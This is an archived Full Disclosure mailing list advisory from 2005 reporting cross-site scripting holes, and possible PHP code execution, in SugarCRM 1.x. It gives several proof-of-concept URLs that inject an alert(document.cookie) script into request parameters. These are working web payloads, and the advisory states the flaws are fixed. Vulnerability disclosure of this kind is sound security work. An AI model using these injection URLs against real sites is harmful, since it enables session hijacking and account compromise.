Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

fulldisclosure logo Full Disclosure mailing list archives

Cross Site Scripting Vulnerabilities and Possible Code Execution in SugarCRM
From: Joxean Koret <joxeankoret () yahoo es>
Date: Sat, 01 Jan 2005 19:58:44 +0000
----------------------------------------------------------------------------
Cross Site Scripting Vulnerabilities and Possible Code Execution in
SugarCRM
----------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2004 
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SugarCRM 1.X - Manage leads, opportunities, contacts and more inside of
a 
state-of-the-art user interface. Built on PHP and MySQL

Web : http://sugarcrm.sourceforge.net

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Cross Site Scripting Vulnerability

A1. In the main script (index.php) various parameters, that are used to
write the
html code, not are verified. 

At least the following URLs are vulnerables to XSS (Cross Site
Scripting) attacks : 

http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_module="><script>alert(document.cookie)</script>&return_action=index

http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_module=&return_action="><script>alert(document.cookie)</script>

http://<site-with-sugarcrm>/sugarcrm/index.php?name=%22%3E%3Cscript%
3Ealert%28document.cookie%29%3C%2Fscript%
3E&address_city=&website=&phone=&action=ListView&query=true&module=Accounts&button=Search

And the following are XSS vulnerables and, may be, arbitrary PHP remote
code execution 
vulnerables as well : 

http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts"><script>alert(document.cookie)</script>&record=d676f046-1be5-dc36-114e-4138f972bf5d

http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts''''&record=[RECORD 
ID]"><script>alert(document.cookie)</script>


The fix:
~~~~~~~~

All problems are fixed in the latests versions availables at the
sugarcrm site.
Go to http://sugarcrm.sourceforge.net site for more info about the new
versions.

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is
provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory. 

---------------------------------------------------------------------------

Contact:
~~~~~~~~

        Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

Attachment: signature.asc
Description: This is a digitally signed message part

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

  By Date           By Thread  

Current thread:
  • Cross Site Scripting Vulnerabilities and Possible Code Execution in SugarCRM Joxean Koret (Jan 02)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]